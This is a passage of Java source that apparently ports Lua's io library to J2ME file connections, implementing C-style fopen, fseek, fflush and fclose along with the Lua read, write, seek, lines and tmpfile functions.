                        if ( k == -1 ) {
                            return null;
                        }
                        str.append ( ( char ) k );
                        bufferPosition ++;
                        if ( ( ( char ) k ) == '\n' )
                            return str;
                    }
                    return str;
                }
                case ACCESS_MODE_READ_PLUS:
                case ACCESS_MODE_WRITE_PLUS:
                case ACCESS_MODE_APPEND_PLUS: {
                    lastOp = OP_READ;
                    for ( int i = 0; i < num; i ++ ) {
                        if ( bufferPosition >= buffer.length () ) {
                            // EOF: null only if nothing was read this call.
                            if ( i == 0 )
                                return null;
                            else
                                return str;
                        }
                        else {
                            str.append ( buffer.charAt ( bufferPosition ) );
                            if ( buffer.charAt ( bufferPosition ++ ) == '\n' )
                                return str;
                        }
                    }
                    return str;
                }
            }
            return null;
        }
        catch ( Exception ex ) {
            return null;
        }
    }
    /** Current file offset, like C ftell. */
    public int ftell () {
        return bufferPosition;
    }
    /**
     * Repositions the stream like C fseek (flushing first). Returns 0 on
     * success, 1 on failure. In "r" mode relies on mark()/reset()/skip()
     * on the underlying InputStream; SEEK_END in "r" mode determines the
     * file size by reading the stream to the end.
     */
    public int fseek ( long offset, int origin ) throws Exception {
        fflush ();
        switch ( origin ) {
            case SEEK_SET:
            {
                if ( offset < 0 )
                    return 1;
                switch ( accessMode ) {
                    case ACCESS_MODE_READ: {
                        if ( connection == null )
                            return 1;
                        if ( inputStream == null )
                            inputStream = connection.openInputStream ();
                        if ( inputStream == null )
                            return 1;
                        inputStream.reset ();
                        inputStream.skip ( offset );
                        bufferPosition = ( int ) ( offset );
                        return 0;
                    }
                    case ACCESS_MODE_WRITE:
                    case ACCESS_MODE_APPEND:
                    case ACCESS_MODE_READ_PLUS:
                    case ACCESS_MODE_WRITE_PLUS:
                    case ACCESS_MODE_APPEND_PLUS: {
                        bufferPosition = ( int ) ( offset );
                        return 0;
                    }
                }
            }
            break;
            case SEEK_CUR:
            {
                switch ( accessMode ) {
                    case ACCESS_MODE_READ: {
                        if ( connection == null )
                            return 1;
                        if ( inputStream == null )
                            inputStream = connection.openInputStream ();
                        if ( inputStream == null )
                            return 1;
                        bufferPosition += ( int ) ( offset );
                        if ( bufferPosition < 0 )
                            bufferPosition = 0;
                        if ( offset > 0 ) {
                            // Forward: just skip ahead.
                            inputStream.skip ( offset );
                            return 0;
                        }
                        else {
                            // Backward: rewind to the mark and re-skip.
                            inputStream.reset ();
                            inputStream.skip ( bufferPosition );
                            return 0;
                        }
                    }
                    case ACCESS_MODE_WRITE:
                    case ACCESS_MODE_APPEND:
                    case ACCESS_MODE_READ_PLUS:
                    case ACCESS_MODE_WRITE_PLUS:
                    case ACCESS_MODE_APPEND_PLUS: {
                        bufferPosition += ( int ) ( offset );
                        if ( bufferPosition < 0 )
                            bufferPosition = 0;
                        return 0;
                    }
                }
            }
            break;
            case SEEK_END:
            {
                if ( offset < 0 )
                    return 1;
                switch ( accessMode ) {
                    case ACCESS_MODE_READ: {
                        if ( connection == null )
                            return 1;
                        if ( inputStream == null )
                            inputStream = connection.openInputStream ();
                        if ( inputStream == null )
                            return 1;
                        // Size is discovered by reading the stream to the end.
                        int fileSize = 0;
                        byte c; // unused; kept as-is
                        int j = 0;
                        inputStream.reset ();
                        while ( ( j = inputStream.read () ) != -1 ) {
                            fileSize ++;
                        }
                        inputStream.reset ();
                        bufferPosition = fileSize - ( int ) offset;
                        if ( bufferPosition < 0 )
                            bufferPosition = 0;
                        inputStream.skip ( bufferPosition );
                        return 0;
                    }
                    case ACCESS_MODE_WRITE:
                    case ACCESS_MODE_APPEND:
                    case ACCESS_MODE_READ_PLUS:
                    case ACCESS_MODE_WRITE_PLUS:
                    case ACCESS_MODE_APPEND_PLUS: {
                        int fileSize = buffer.length ();
                        bufferPosition = fileSize - ( int ) offset;
                        if ( bufferPosition < 0 )
                            bufferPosition = 0;
                        return 0;
                    }
                }
            }
            break;
        }
        return 1;
    }
    /**
     * Rewrites the whole file from the in-memory mirror (non-"r" modes) by
     * reopening the output stream. No-op (success) for read-only streams.
     * Returns 0 on success, 1 on failure; resets the read/write alternation
     * guard either way.
     */
    public int fflush () throws Exception {
        lastOp = OP_NONE;
        switch ( accessMode ) {
            case ACCESS_MODE_READ: {
                return 0;
            }
            case ACCESS_MODE_WRITE:
            case ACCESS_MODE_APPEND:
            case ACCESS_MODE_READ_PLUS:
            case ACCESS_MODE_WRITE_PLUS:
            case ACCESS_MODE_APPEND_PLUS: {
                if ( connection == null )
                    return 1;
                // Reopen from offset 0 so the file is rewritten in full.
                if ( outputStream != null ) {
                    outputStream.close ();
                    outputStream = null;
                }
                outputStream = connection.openOutputStream ();
                if ( outputStream == null )
                    return 1;
                if ( isFlushed ) {
                    return 0;
                }
                else {
                    outputStream.write ( buffer.toString ().getBytes () );
                    isFlushed = true;
                    return 0;
                }
            }
        }
        return 0;
    }
    /**
     * Flushes and closes streams and the connection, deletes the backing
     * file when it was created by tmpfile(), and deregisters from
     * LuaIOLib.tempFiles. Returns 0 on success, -1 on failure or if
     * already closed.
     */
    public int fclose () {
        if ( isClosed ) {
            return -1;
        }
        try {
            if ( fflush () != 0 )
                return -1;
            if ( inputStream != null ) {
                inputStream.close ();
                inputStream = null;
            }
            if ( outputStream != null ) {
                outputStream.close ();
                outputStream = null;
            }
            if ( connection != null ) {
                if ( isTmpFile && connection.exists () ) {
                    connection.delete ();
                }
                connection.close ();
                connection = null;
            }
            if ( buffer != null ) {
                buffer = null;
            }
            // Self-deregister from the temp-file registry (see tmpfile()).
            if ( tempFiles != null && tempFiles.contains ( this ) ) {
                tempFiles.removeElement ( this );
            }
            System.gc ();
            isClosed = true;
            return 0;
        }
        catch ( Exception ex ) {
            return -1;
        }
    }
    /**
     * Sets the buffering policy (_IOFBF/_IOLBF/_IONBF) and flush threshold,
     * like C setvbuf. Returns 0 on success, 1 on invalid arguments.
     */
    public int setvbuf ( int mode, int buffSize ) {
        if ( buffSize <= 0 && mode != _IONBF )
            return 1;
        bufferingType = mode;
        bufferSize = buffSize;
        return 0;
    }
}
// Name under which this library is registered.
public static final String LUA_IOLIBNAME = "io";
// Open temporary files created by tmpfile(); each FileStruct removes itself
// in fclose(). Created lazily, torn down by clearTempFilesVector().
private static Vector tempFiles = null;
/**
 * Closes every temp file created by tmpfile() and drops the registry.
 *
 * FileStruct.fclose() removes the file from tempFiles, so the original
 * index-based loop over the live vector skipped every other entry and
 * eventually threw ArrayIndexOutOfBoundsException from elementAt().
 * Snapshot the contents first, then close each file from the snapshot.
 */
public static void clearTempFilesVector () {
    if ( tempFiles == null ) {
        return;
    }
    int size = tempFiles.size ();
    FileStruct[] snapshot = new FileStruct[size];
    tempFiles.copyInto ( snapshot );
    for ( int i = 0; i < size; i ++ ) {
        // Each fclose() also deregisters the file from tempFiles.
        snapshot[i].fclose ();
    }
    if ( tempFiles != null ) {
        tempFiles.removeAllElements ();
        tempFiles = null;
    }
}
/** Convenience overload: opens filename in read-only mode ("r"). */
public static FileStruct fopen ( FileStruct file, String filename ) {
    return fopen ( file, filename, "r" );
}
/**
 * Implements io.tmpfile(): creates a "w+" file named by the current time
 * under the first available filesystem root, and registers it in tempFiles
 * so it is deleted on fclose()/clearTempFilesVector(). Raises a Lua error
 * if no filesystem root exists; returns null if fopen fails.
 */
public static FileStruct tmpfile ( lua_State thread, FileStruct file ) {
    file.isTmpFile = true;
    Enumeration roots = FileSystemRegistry.listRoots ();
    String root = null;
    while ( roots.hasMoreElements () ) {
        root = ( String ) roots.nextElement ();
        if ( root != null ) {
            root = "/" + root;
            break;
        }
    }
    if ( root == null ) {
        LuaAPI.luaL_error ( thread, "There are no available FileSystem root for temp file creation" );
    }
    // Name derived from the clock; collisions presumably negligible on-device.
    root += System.currentTimeMillis () + ".txt";
    file = fopen ( file, root, "w+" );
    if ( file != null ) {
        if ( tempFiles == null ) {
            tempFiles = new Vector ();
        }
        tempFiles.addElement ( file );
    }
    return file;
}
/**
 * C-style fopen over a JSR-75 FileConnection.
 *
 * Parses the mode string ("r", "w", "a", optional "+" and "b"), opens the
 * connection (prefixing "file://" when absent), creates/truncates the file
 * as the mode requires, and preloads the in-memory mirror for the buffered
 * modes (append and "+"). Returns the populated FileStruct, or null on any
 * failure (closing whatever was opened).
 *
 * Cleanup vs. the original: removed the dead commented-out Connector mode
 * experiment and the empty finally block; live behavior is unchanged.
 */
public static FileStruct fopen ( FileStruct file, String filename, String mode ) {
    if ( filename == null || mode == null )
        return null;
    if ( ! filename.startsWith ( "file://" ) )
        filename = "file://" + filename;
    file.buffer = new StringBuffer ();
    if ( mode.indexOf ( "b" ) != -1 )
        file.binaryMode = true;
    file.bothRWMode = false;
    if ( mode.indexOf ( "+" ) != -1 )
        file.bothRWMode = true;
    // Base mode; "+" upgrades it to the corresponding read/write variant.
    if ( mode.indexOf ( "r" ) != -1 ) {
        if ( file.bothRWMode )
            file.accessMode = FileStruct.ACCESS_MODE_READ_PLUS;
        else
            file.accessMode = FileStruct.ACCESS_MODE_READ;
    }
    if ( mode.indexOf ( "w" ) != -1 ) {
        if ( file.bothRWMode )
            file.accessMode = FileStruct.ACCESS_MODE_WRITE_PLUS;
        else
            file.accessMode = FileStruct.ACCESS_MODE_WRITE;
    }
    if ( mode.indexOf ( "a" ) != -1 ) {
        if ( file.bothRWMode )
            file.accessMode = FileStruct.ACCESS_MODE_APPEND_PLUS;
        else
            file.accessMode = FileStruct.ACCESS_MODE_APPEND;
    }
    try {
        file.connection = ( FileConnection ) Connector.open ( filename );
        if ( file.connection == null )
            return null;
        if ( ! file.connection.exists () ) {
            // Missing file: an error for read modes, created for the rest.
            if ( file.accessMode == FileStruct.ACCESS_MODE_READ || file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS ) {
                return null;
            }
            else if ( file.accessMode == FileStruct.ACCESS_MODE_APPEND || file.accessMode == FileStruct.ACCESS_MODE_APPEND_PLUS || file.accessMode == FileStruct.ACCESS_MODE_WRITE || file.accessMode == FileStruct.ACCESS_MODE_WRITE_PLUS )
                file.connection.create ();
        }
        else if ( file.accessMode == FileStruct.ACCESS_MODE_WRITE || file.accessMode == FileStruct.ACCESS_MODE_WRITE_PLUS ) {
            // "w"/"w+" truncate: delete and recreate the existing file.
            file.connection.delete ();
            file.connection.close ();
            file.connection = null;
            file.connection = ( FileConnection ) Connector.open ( filename );
            if ( ! file.connection.exists () ) {
                file.connection.create ();
            }
        }
        if ( file.accessMode == FileStruct.ACCESS_MODE_APPEND || file.accessMode == FileStruct.ACCESS_MODE_APPEND_PLUS || file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS ) {
            // Buffered modes: preload the whole file into the mirror.
            file.inputStream = file.connection.openInputStream ();
            if ( file.inputStream == null )
                return null;
            int j = 0;
            while ( ( j = file.inputStream.read () ) != -1 ) {
                file.buffer.append ( ( char ) j );
            }
            // "r+" starts at the beginning; append modes start at the end.
            if ( file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS )
                file.bufferPosition = 0;
            else
                file.bufferPosition = file.buffer.length ();
        }
        else {
            file.bufferPosition = 0;
        }
        if ( file.accessMode == FileStruct.ACCESS_MODE_READ ) {
            file.inputStream = file.connection.openInputStream ();
            if ( file.inputStream == null )
                return null;
            else
                // Mark position 0 so fseek() can reset()/skip() later.
                file.inputStream.mark ( Integer.MAX_VALUE );
        }
    }
    catch ( Exception ex ) {
        // Best-effort cleanup of whatever was opened before the failure.
        if ( file != null ) {
            if ( file.inputStream != null ) {
                try {
                    file.inputStream.close ();
                }
                catch ( IOException e ) {
                }
                finally {
                    file.inputStream = null;
                }
            }
            if ( file.connection != null ) {
                try {
                    file.connection.close ();
                }
                catch ( IOException e ) {
                }
                finally {
                    file.connection = null;
                }
            }
        }
        return null;
    }
    return file;
}
/**
 * Probe for EOF without consuming input (the read(0) format): attempt a
 * one-char read and, if it succeeded, seek back. Pushes the empty string
 * as the result; returns 1 when more input remains, 0 at EOF. On a failed
 * rewind, returns 0 without pushing anything.
 */
static int test_eof ( lua_State thread, FileStruct f ) {
    final int probe = f.fread ( new StringBuffer (), 1, 1 );
    if ( probe != -1 ) {
        try {
            f.fseek ( -1, SEEK_CUR );
        }
        catch ( Exception ex ) {
            return 0;
        }
    }
    LuaAPI.lua_pushlstring ( thread, "", 0 );
    if ( probe == -1 ) {
        return 0;
    }
    return 1;
}
/**
 * Read format read(n): read up to n chars in LUAL_BUFFERSIZE chunks and
 * push them as a string. Returns 1 when the full count was read or at
 * least something was accumulated, 0 otherwise.
 */
static int read_chars ( lua_State thread, FileStruct file, int n ) {
    StringBuffer accumulated = new StringBuffer ();
    // Chunk size: at most one auxlib buffer, never more than requested.
    int chunk = LuaAPI.LUAL_BUFFERSIZE;
    if ( chunk > n ) {
        chunk = n;
    }
    int remaining = n;
    int got;
    do {
        got = file.fread ( accumulated, 1, chunk );
        remaining -= got;
    } while ( remaining > 0 && got == chunk );
    LuaAPI.lua_pushstring ( thread, accumulated.toString () );
    if ( remaining == 0 || LuaAPI.lua_objlen ( thread, -1 ) > 0 ) {
        return 1;
    }
    return 0;
}
static void read_number ( lua_State thread, FileStruct file ) throws Exception {
//Double d = Scanf.readNumber(file.inputStream);
double d = file.readNumber ();
LuaAPI.lua_pushnumber ( thread, d );
}
/**
 * Read format "*l": accumulate chars into p (fgets appends in place) until
 * a newline or EOF, then push the line without its trailing '\n'.
 * Returns 1 if a line (or any chars before EOF) was read, 0 at bare EOF.
 */
static int read_line ( lua_State thread, FileStruct file ) {
    StringBuffer p = new StringBuffer ();
    for (;;) {
        int l;
        if ( file.fgets ( p, LuaAPI.LUAL_BUFFERSIZE ) == null )/* eof? */ {
            // fgets returned null, but any partial data is still in p.
            LuaAPI.lua_pushstring ( thread, p.toString () );// luaL_pushresult(&b); /* close buffer */
            int res = 0;
            if ( LuaAPI.lua_objlen ( thread, -1 ) > 0 ) /* check whether read something */
                res = 1;
            return res;
        }
        //String c = p.toString();
        //System.out.println(c);
        l = p.length ();
        if ( l == 0 || p.charAt ( l - 1 ) != '\n' ) {
            // Line longer than one fgets() chunk: loop and keep appending.
            //luaL_addsize(&b, l);
        }
        else {
            //luaL_addsize(&b, l - 1); /* do not include `eol' */
            String str = p.toString ();
            int len = str.length ();
            len -= 1;
            if ( len < 0 )
                len = 0;
            LuaAPI.lua_pushstring ( thread, str.substring ( 0, len ) );/* do not include `eol' */
            //luaL_pushresult(&b); /* close buffer */
            return 1; /* read at least an `eol' */
        }
    }
}
/**
 * Shared implementation of io.read()/file:read(). 'first' is the stack
 * index of the first format argument. With no arguments, reads one line.
 * Otherwise processes each format in turn: a number means read that many
 * chars; "*n"/"*l"/"*a" read a number, a line, or the rest of the file.
 * Pushes one result per format; a failed read replaces its result with
 * nil. Returns the number of results pushed.
 */
static int g_read ( lua_State thread, FileStruct file, int first ) {
    int nargs = LuaAPI.lua_gettop ( thread ) - 1;
    int success;
    int n;
    if ( nargs == 0 ) /* no arguments? */ {
        success = read_line ( thread, file );
        n = first + 1; /* to return 1 result */
    }
    else /* ensure stack space for all results and for auxlib's buffer */ {
        LuaAPI.luaL_checkstack ( thread, nargs + LuaAPI.LUA_MINSTACK, "too many arguments" );
        success = 1;
        for ( n = first; ( nargs -- ) != 0 && success != 0; n ++ ) {
            if ( LuaAPI.lua_type ( thread, n ) == /*LUA_TNUMBER*/ 3 ) {
                // Numeric format: read exactly that many chars (0 = EOF probe).
                int l = ( int ) LuaAPI.lua_tointeger ( thread, n );
                success = ( l == 0 ) ? test_eof ( thread, file ) : read_chars ( thread, file, l );
            }
            else {
                String p = LuaAPI.lua_tostring ( thread, n );
                LuaAPI.luaL_argcheck ( thread, p != null && p.charAt ( 0 ) == '*', n, "invalid option" );
                switch ( p.charAt ( 1 ) ) {
                    case 'n': /* number */
                        success = 1;
                        try {
                            read_number ( thread, file );
                        }
                        catch ( Exception ex ) {
                            // Malformed number: treated as a failed read.
                            success = 0;
                        }
                        break;
                    case 'l': /* line */
                        success = read_line ( thread, file );
                        break;
                    case 'a': /* file */
                        read_chars ( thread, file, Integer.MAX_VALUE ); /* read MAX_SIZE_T chars */
                        success = 1; /* always success */
                        break;
                    default:
                        return LuaAPI.luaL_argerror ( thread, n, "invalid format" );
                }
            }
        }
    }
    //if (ferror(f))
    // return pushresult(thread, 0, null);
    if ( success != 1 ) {
        LuaAPI.lua_pop ( thread, 1 ); /* remove last result */
        LuaAPI.lua_pushnil ( thread ); /* push nil instead */
    }
    return n - first;
}
/** io.read(...): read from the default input file. */
public static final class io_read implements JavaFunction {
    public int Call ( lua_State thread ) {
        final FileStruct defaultInput = getiofile ( thread, IO_INPUT );
        return g_read ( thread, defaultInput, 1 );
    }
}
/**
 * Fetches the default file (IO_INPUT or IO_OUTPUT) from the library
 * environment table; raises a Lua error if it is missing or closed.
 */
static FileStruct getiofile ( lua_State thread, int findex ) {
    LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, findex );
    final FileStruct file = ( FileStruct ) LuaAPI.lua_touserdata ( thread, -1 );
    if ( file == null || file.isClosed ) {
        LuaAPI.luaL_error ( thread, "standard " + fnames[findex - 1] + " file is closed" );
    }
    return file;
}
/** file:read(...): read from an explicit file handle (stack slot 1). */
public static final class f_read implements JavaFunction {
    public int Call ( lua_State thread ) {
        final FileStruct handle = tofile ( thread );
        return g_read ( thread, handle, 2 );
    }
}
/**
 * Shared implementation of io.input()/io.output(). With an argument (a
 * filename to open with 'mode', or an open file handle) it replaces the
 * default file in environment slot f. Always returns the current default
 * file (1 result).
 */
static int g_iofile ( lua_State thread, int f, String mode ) {
    if ( ! LuaAPI.lua_isnoneornil ( thread, 1 ) ) {
        String filename = LuaAPI.lua_tostring ( thread, 1 );
        if ( filename != null ) {
            // Filename given: open it and let the new userdata become the default.
            FileStruct pf = newfile ( thread );
            pf = fopen ( pf, filename, mode );
            if ( pf == null )
                fileerror ( thread, 1, filename );
        }
        else {
            tofile ( thread ); /* check that it's a valid file handle */
            LuaAPI.lua_pushvalue ( thread, 1 );
        }
        // Store the value on top of the stack as the new default file.
        LuaAPI.lua_rawseti ( thread, LuaAPI.LUA_ENVIRONINDEX, f );
    }
    /* return current value */
    LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, f );
    return 1;
}
/** io.input([file]): get or set the default input file. */
public static final class io_input implements JavaFunction {
    public int Call ( lua_State thread ) {
        final String openMode = "r";
        return g_iofile ( thread, IO_INPUT, openMode );
    }
}
/** io.output([file]): get or set the default output file. */
public static final class io_output implements JavaFunction {
    public int Call ( lua_State thread ) {
        final String openMode = "w";
        return g_iofile ( thread, IO_OUTPUT, openMode );
    }
}
/**
 * Shared implementation of io.write()/file:write(). Writes each argument
 * from stack slot 'arg' onward: numbers are formatted with "%.14g" (as in
 * C Lua), everything else must be a string. Stops tracking success after
 * the first failure and reports via pushresult().
 */
static int g_write ( lua_State thread, FileStruct f, int arg ) {
    int nargs = LuaAPI.lua_gettop ( thread ) - 1;
    int status = 1;
    for (; ( nargs -- ) > 0; arg ++ ) {
        if ( LuaAPI.lua_type ( thread, arg ) == LuaAPI.LUA_TNUMBER ) {
            /* optimization: could be done exactly as for strings */
            /* String str = "" + LuaAPI.lua_tonumber(thread, arg);
            int g = str.substring(str.indexOf(".") + 1, str.length()).length();
            if(g > 14)
            str = str.substring(0, str.length() - (g - 14));
            StringBuffer sb = new StringBuffer();
            sb.append(str);
            if(status == 1 && f.fwrite(sb, 1, sb.length()) > 0)
            status = 1;
            else
            status = 0;
            */
            String str = "";
            try {
                // Matches C Lua's LUAI_NUMFFORMAT ("%.14g").
                str = new Printf ( "%.14g" ).sprintf ( LuaAPI.lua_tonumber ( thread, arg ) );
            }
            catch ( Exception ex ) {
                status = 0;
            }
            status = status == 1 && f.fwrite ( str, 1, str.length () ) > 0 ? 1 : 0;
        }
        else {
            String s = LuaAPI.luaL_checklstring ( thread, arg );
            int iStrLen = LuaStringLib.StringLength ( s );
            // A short write counts as failure.
            status = status == 1 && ( f.fwrite ( s, 1, iStrLen ) == iStrLen ) ? 1 : 0;
        }
    }
    return pushresult ( thread, status, null );
}
/** io.write(...): write to the default output file. */
public static final class io_write implements JavaFunction {
    public int Call ( lua_State thread ) {
        final FileStruct defaultOutput = getiofile ( thread, IO_OUTPUT );
        return g_write ( thread, defaultOutput, 1 );
    }
}
/** file:write(...): write to an explicit file handle (stack slot 1). */
public static final class f_write implements JavaFunction {
    public int Call ( lua_State thread ) {
        final FileStruct handle = tofile ( thread );
        return g_write ( thread, handle, 2 );
    }
}
/**
 * file:seek([whence[, offset]]): reposition the file. 'whence' is one of
 * "set"/"cur"/"end" (default "cur"), offset defaults to 0. On success
 * pushes the new position; on failure returns nil + message via pushresult.
 */
public static final class f_seek implements JavaFunction {
    public int Call ( lua_State thread ) {
        // Parallel arrays: option name -> FileStruct seek origin.
        final int[] mode = { SEEK_SET, SEEK_CUR, SEEK_END };
        final String[] modenames = { "set", "cur", "end" };
        FileStruct f = tofile ( thread );
        int op = LuaAPI.luaL_checkoption ( thread, 2, "cur", modenames );
        long offset = LuaAPI.luaL_optlong ( thread, 3, 0 );
        try {
            // 'op' is reused as fseek's status (0 = success).
            op = f.fseek ( offset, mode[op] );
        }
        catch ( Exception ex ) {
            op = 1;
        }
        if ( op != 0 )
            return pushresult ( thread, 0, null ); /* error */
        else {
            LuaAPI.lua_pushinteger ( thread, f.ftell () );
            return 1;
        }
    }
}
/** io.flush(): flush the default output file; reports via pushresult(). */
public static final class io_flush implements JavaFunction {
    public int Call ( lua_State thread ) {
        int ok = 0;
        try {
            // getiofile stays inside the try: any error from it or from
            // fflush() is reported as a failed flush.
            if ( getiofile ( thread, IO_OUTPUT ).fflush () == 0 ) {
                ok = 1;
            }
        }
        catch ( Exception ex ) {
            ok = 0;
        }
        return pushresult ( thread, ok, null );
    }
}
/** Implements file:flush(): flushes the given file handle. */
public static final class f_flush implements JavaFunction {
    public int Call ( lua_State thread ) {
        int ok;
        try {
            // fflush() returns 0 on success.
            ok = ( tofile ( thread ).fflush () == 0 ) ? 1 : 0;
        }
        catch ( Exception ex ) {
            ok = 0;
        }
        return pushresult ( thread, ok, null );
    }
}
/* Returns the file handle at stack index 1, raising a Lua error if it is missing or already closed. */
static FileStruct tofile ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
if ( f == null || f.isClosed == true )
LuaAPI.luaL_error ( thread, "attempt to use a closed file" );
return f;
}
/**
 * Iterator function produced by io.lines / file:lines.
 * Upvalue 1 holds the file userdata; upvalue 2 is a boolean telling
 * whether this iterator created (and therefore must close) the file.
 */
public static final class io_readline implements JavaFunction {
    public int Call ( lua_State thread ) {
        FileStruct file = ( FileStruct ) LuaAPI.lua_touserdata ( thread, LuaAPI.lua_upvalueindex ( 1 ) );
        if ( file == null || file.isClosed == true ) /* file is already closed? */
            LuaAPI.luaL_error ( thread, "file is already closed" );
        int success = read_line ( thread, file );
        if ( success == 1 )
            return 1;
        /* EOF reached */
        if ( LuaAPI.lua_toboolean ( thread, LuaAPI.lua_upvalueindex ( 2 ) ) ) /* generator created file? */ {
            LuaAPI.lua_settop ( thread, 0 );
            LuaAPI.lua_pushvalue ( thread, LuaAPI.lua_upvalueindex ( 1 ) );
            aux_close ( thread ); /* close it */
        }
        return 0;
    }
}
/** Implements io.close([file]): closes the given file, defaulting to the current output. */
public static final class io_close implements JavaFunction {
public int Call ( lua_State thread ) {
if ( LuaAPI.lua_gettop ( thread ) < 2 )
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, IO_OUTPUT ); // no argument: use the default output file
tofile ( thread ); /* make sure argument is a file */
return aux_close ( thread );
}
}
/** __gc metamethod: closes the file when its userdata is garbage-collected. */
public static final class io_gc implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
/* ignore closed files */
if ( f != null )
aux_close ( thread );
return 0;
}
}
/** __tostring metamethod: returns "file (...)" or "file (closed)" for a file handle. */
public static final class io_tostring implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
if ( f == null || f.isClosed == true )
LuaAPI.lua_pushliteral ( thread, "file (closed)" );
else
LuaAPI.lua_pushfstring ( thread, "file (" + f.toString () + ")" );
return 1;
}
}
/** Implements io.open(filename [, mode]): returns a file handle, or nil plus an error. */
public static final class io_open implements JavaFunction {
public int Call ( lua_State thread ) {
String filename = LuaAPI.luaL_checkstring ( thread, 1 );
String mode = LuaAPI.luaL_optstring ( thread, 2, "r" );
FileStruct pf = newfile ( thread );
pf = fopen ( pf, filename, mode );
// On failure pushresult replaces the result with nil + message + errno (3 values).
return ( pf == null ) ? pushresult ( thread, 0, filename ) : 1;
}
}
/*
** this function has a separated environment, which defines the
** correct __close for 'popen' files
*/
/** Implements io.popen: not supported on this platform; always raises a Lua error. */
public static final class io_popen implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.luaL_error ( thread, "Not implemented yet" );
return -1;
/* String filename = LuaAPI.luaL_checkstring(thread, 1);
String mode = LuaAPI.luaL_optstring(thread, 2, "r");
FileStruct pf = newfile(thread);
//pf = lua_popen(thread, filename, mode);
return (pf == null) ? pushresult(thread, 0, filename) : 1;
*/
}
}
/** Implements io.tmpfile(): returns a handle to a temporary file, or nil plus an error. */
public static final class io_tmpfile implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct pf = newfile ( thread );
pf = tmpfile ( thread, pf );
return ( pf == null ) ? pushresult ( thread, 0, null ) : 1;
}
}
/** __close implementation for regular files: closes the underlying stream. */
public static final class io_fclose implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct p = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
int ok = p.fclose () == 0 ? 1 : 0; // fclose() returns 0 on success
p = null;
return pushresult ( thread, ok, null );
}
}
/** __close implementation for the standard files (stdin/stdout/stderr): refuses to close them. */
public static final class io_noclose implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.lua_pushnil ( thread );
LuaAPI.lua_pushliteral ( thread, "cannot close standard file" );
return 2;
}
}
/** __close implementation for popen'ed files; unsupported here (popen itself is unimplemented). */
public static final class io_pclose implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.luaL_error ( thread, "Not implemented yet" );
return -1;
/* FileStruct p = (FileStruct)LuaAPI.luaL_checkudata(thread, 1, LuaAPI.LUA_FILEHANDLE);
int ok = 0;//lua_pclose(thread, p);
p = null;
return pushresult(thread, ok, null);
*/
}
}
/** Implements file:lines(): returns a line iterator that does NOT close the file at EOF. */
public static final class f_lines implements JavaFunction {
public int Call ( lua_State thread ) {
tofile ( thread ); /* check that it's a valid file handle */
aux_lines ( thread, 1, 0 );
return 1;
}
}
/*
** Builds the io_readline closure: upvalue 1 is the file at stack index
** 'idx', upvalue 2 tells the iterator whether to close the file at EOF.
*/
static void aux_lines ( lua_State thread, int idx, int toclose ) {
    LuaAPI.lua_pushvalue ( thread, idx );
    LuaAPI.lua_pushboolean ( thread, toclose == 1 ); /* close/not close file when finished */
    LuaAPI.lua_pushjavafunction ( thread, new io_readline (), 2 );
}
/** Implements io.lines([filename]): iterates the named file (closing it at EOF) or the default input. */
public static final class io_lines implements JavaFunction {
public int Call ( lua_State thread ) {
if ( LuaAPI.lua_isnoneornil ( thread, 1 ) ) /* no arguments? */ {
/* will iterate over default input */
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, IO_INPUT );
return new f_lines ().Call ( thread );
}
else {
String filename = LuaAPI.luaL_checkstring ( thread, 1 );
FileStruct pf = newfile ( thread );
pf = fopen ( pf, filename, "r" );
if ( pf == null )
fileerror ( thread, 1, filename );
aux_lines ( thread, LuaAPI.lua_gettop ( thread ), 1 ); // toclose=1: the iterator owns and closes this file
return 1;
}
}
}
/*
** Pushes the conventional io-library result: true (1 value) when i != 0,
** otherwise nil + error message + errno (3 values).
*/
static int pushresult ( lua_State thread, int i, String filename ) {
int en = 0;//errno; /* calls to Lua API may change this value */
if ( i != 0 ) {
LuaAPI.lua_pushboolean ( thread, true );
return 1;
}
else {
LuaAPI.lua_pushnil ( thread );
if ( filename != null )
LuaAPI.lua_pushfstring ( thread, filename + ": " + "error"/*FIXME: error msg must be correct "%s: %s", filename, strerror(en)*/ );
else
LuaAPI.lua_pushfstring ( thread, "error"/*FIXME: error msg must be correct "%s", strerror(en)*/ );
LuaAPI.lua_pushinteger ( thread, en );
return 3;
}
}
/* Raises a Lua argument error of the form "<filename>: <error>" for argument 'arg'. */
static void fileerror ( lua_State thread, int arg, String filename ) {
LuaAPI.lua_pushfstring ( thread, filename + ":" + "error"/*FIXME: error string must be correct "%s: %s", filename, strerror(errno)*/ );
LuaAPI.luaL_argerror ( thread, arg, LuaAPI.lua_tostring ( thread, -1 ) );
}
/** Implements io.type(obj): returns "file", "closed file", or nil if obj is not a file handle. */
public static final class io_type implements JavaFunction {
public int Call ( lua_State thread ) {
Object ud = null;
LuaAPI.luaL_checkany ( thread, 1 );
ud = LuaAPI.lua_touserdata ( thread, 1 );
LuaAPI.lua_getfield ( thread, LuaAPI.LUA_REGISTRYINDEX, LuaAPI.LUA_FILEHANDLE );
// A value is a file handle iff its metatable is the registered LUA_FILEHANDLE metatable.
if ( ud == null || ! LuaAPI.lua_getmetatable ( thread, 1 ) || ! LuaAPI.lua_rawequal ( thread, -2, -1 ) )
LuaAPI.lua_pushnil ( thread ); /* not a file */
else if ( ( ( FileStruct ) ud ).isClosed == true )
